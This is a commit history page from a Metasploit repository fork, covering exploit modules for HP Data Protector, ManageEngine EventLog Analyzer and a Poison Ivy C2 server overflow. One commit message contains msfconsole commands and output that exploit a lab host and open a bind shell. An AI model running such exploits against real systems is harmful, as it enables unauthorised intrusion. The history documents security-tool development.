adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
55,054 Commits 27 Branches 1,043 Tags
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
Commit Graph

588 Commits

Author SHA1 Message Date
root d72492fe30 Add support for older Data Protector versions 
Increases support by enabling all SSL ciphers. Some older versions
of DP only support weaker export ciphers not enabled by default.
 2016-06-01 10:45:47 +01:00
Ian Lovering eb2398a446 Renamed hp_dataprotector_encrypted_comms 
Renamed to match other data protector exploits
 2016-05-31 22:58:32 +01:00
Ian Lovering 54c4771626 Exploit for HP Data Protector Encrypted Comms 
Added exploit for HP Data Protector when using encrypted communications.

This has been tested against v9.00 on Windows Server 2008 R2 but should also work against older versions of DP.
 2016-05-31 22:44:14 +01:00
wchen-r7 816bc91e45 Resolve #6807, remove all OSVDB references. 
OSVDB is no longer a vulnerability database, therefore all the
references linked to it are invalid.

Resolve #6807
 2016-04-23 12:32:34 -05:00
wchen-r7 4a435e8d13 Bring hp_dataprotector_install_service up to date w/ upstream-master 2016-04-22 13:42:41 -05:00
wchen-r7 db1d973ef0 Cosmetic changes for hp_dataprotector_install_service 2016-04-22 13:41:18 -05:00
Adam Cammack 05f585157d Land #6646, add SSL SNI and unify SSLVersion opts 2016-03-15 16:35:22 -05:00
Christian Mehlmauer 3123175ac7 use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00
Brent Cook f703fa21d6 Revert "change Metasploit3 class names" 
This reverts commit 666ae14259.
 2016-03-07 13:19:55 -06:00
Christian Mehlmauer 666ae14259 change Metasploit3 class names 2016-03-07 09:56:58 +01:00
Brent Cook eea8fa86dc unify the SSLVersion fields between modules and mixins 
Also actually handle the 'Auto' option that we had in the crawler and remove
hardcoded defaults in modules that do not need them.
 2016-03-06 22:06:27 -06:00
James Lee 12256a6423 Remove now-redundant peer 
These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient
 2016-02-01 15:12:03 -06:00
benpturner c5773b1a02 Removal of spaces found with msftidy 2016-01-12 17:04:50 +00:00
benpturner 9d64edc16f New module to exploit the Install Service vulnerability inside data protector. I released this vulnearbility on exploit DB some years back but Metasploit didnt support setting up a SMB server at the time. I have re-submitted this module to exploit the vulnerability. I have tested this on Windows Server 2003 and it works without fail. 2016-01-12 16:53:26 +00:00
wchen-r7 cea3bc27b9 Fix #6362, avoid overriding def peer repeatedly 
def peer is a method that gets repeated a lot in modules, so we
should have it in the tcp mixin. This commit also clears a few
modules that use the HttpClient mixin with def peer.
 2015-12-23 11:44:55 -06:00
wchen-r7 154fb585f4 Remove bad references (dead links) 
These links are no longer available. They are dead links.
 2015-10-27 12:41:32 -05:00
William Vu 86dfbf23e8 Fix whitespace 2015-10-15 22:48:53 -05:00
xistence 018b515150 Add CVE/URL references to manageengine_eventlog_analyzer_rce 2015-10-16 10:41:39 +07:00
jvazquez-r7 b206de7708 Land #5981, @xistence's ManageEngine EventLog Analyzer Remote Code Execution exploit 2015-09-27 00:42:17 -05:00
jvazquez-r7 55f573b4c9 Do code cleanup 2015-09-27 00:33:40 -05:00
jvazquez-r7 af1cdd6dea Return Appears 2015-09-16 16:34:43 -05:00
jvazquez-r7 402044a770 Delete comma 2015-09-16 16:23:43 -05:00
jvazquez-r7 75c6ace1d0 Use single quotes 2015-09-16 16:23:10 -05:00
jvazquez-r7 88fdc9f123 Clean exploit method 2015-09-16 16:14:21 -05:00
jvazquez-r7 d6a637bd15 Do code cleaning on the check method 2015-09-16 16:12:28 -05:00
xistence c99444a52e ManageEngine EventLog Analyzer Remote Code Execution 2015-09-15 07:29:16 +07:00
samvartaka 0a0e7ab4ba This is a modification to the original poisonivy_bof.rb exploit 
module removing the need for bruteforce in the case of an unknown
server password by (ab)using the challenge-response as an encryption
oracle, making it more reliable. The vulnerability has also been confirmed
in versions 2.2.0 up to 2.3.1 and additional targets for these versions
have been added as well.

See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/
for details.

## Console output

Below is an example of the new functionality (PIVY C2 server password is
set to 'prettysecure' and unknown to attacker). Exploitation of versions 2.3.0 and 2.3.1
is similar.

### Version 2.3.2 (unknown password)

```
msf > use windows/misc/poisonivy_bof
msf exploit(poisonivy_bof) > set RHOST 192.168.0.103
RHOST => 192.168.0.103
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2>
```

### Version 2.2.0 (unknown password)

```
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.2.0 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.

msf exploit(poisonivy_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1
   1   Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1
   2   Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1

msf exploit(poisonivy_bof) > set TARGET 0
TARGET => 0

msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0>
```
 2015-09-07 17:48:28 +02:00
Christian Mehlmauer 5398bf78eb change exitfunc to thread 2015-09-01 10:46:54 +02:00
Christian Mehlmauer 80a22412d9 use EXITFUNC instead of ExitFunction 2015-08-13 21:22:32 +02:00
Tod Beardsley 3ff91d74ca More cleanup, mostly abysssec 
[See #5012]
 2015-04-02 16:16:38 -05:00
Tod Beardsley 4bbec88882 Various other one-off nonhuman author credits 
[See #5012]
 2015-04-02 15:25:47 -05:00
h00die 28b9e89963 removed duplicate "uses" from description 2015-03-29 19:40:31 -04:00
C-P 0a8fe781d1 paylod vs payload 2015-03-27 11:54:14 -07:00
Tod Beardsley 99494328d2 Update Nvidia module with an OSVDB ref 
The paper is really good, but could use a more traditional reference.

[See #4884]
 2015-03-11 19:51:22 -05:00
jvazquez-r7 2134cc3d22 Modify description 2015-03-05 16:55:24 -06:00
jvazquez-r7 7b4776ee79 Deregister FOLDER_NAME 2015-03-05 16:42:07 -06:00
jvazquez-r7 1bc81ea723 Merge #4884 into updated master 2015-03-05 16:41:15 -06:00
Meatballs 33f089b1a5 Tidyup 2015-03-05 21:50:12 +00:00
Meatballs c56679f33e Modify for new SMB mixin 2015-03-05 21:26:13 +00:00
jvazquez-r7 a06eb04d59 Deregister FOLDER_NAME on exploit modules 2015-03-05 12:27:12 -06:00
jvazquez-r7 fa9d921138 Beautify description 2015-03-04 13:07:10 -06:00
jvazquez-r7 8fdb7a798e Change module filename 2015-03-04 13:01:06 -06:00
jvazquez-r7 36375fab28 Fix downcase path handling 2015-03-04 12:58:41 -06:00
jvazquez-r7 62dde22d88 Clean packet building 2015-03-04 12:27:58 -06:00
jvazquez-r7 e04ff3ee24 Delete CMD option 2015-03-04 11:51:58 -06:00
jvazquez-r7 d4337ce1ae Do minor metadata cleanup 2015-03-04 11:46:01 -06:00
Matthew Hall a5d748d19e Modify primer to utilise file_contents macro. 2015-03-04 09:50:28 +00:00
Matthew Hall 34f4ae782d Modify SMB generation code to use primer based on #3074 changes to 
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
 2015-02-20 11:26:19 +00:00
Matthew Hall 9f04e3bcf0 Merge branch 'master' into hp_dataprotector_dll_cmd_exec 2015-02-17 17:06:40 +00:00
Tod Beardsley c156ed62a9 on, not of. 2015-02-12 12:56:53 -06:00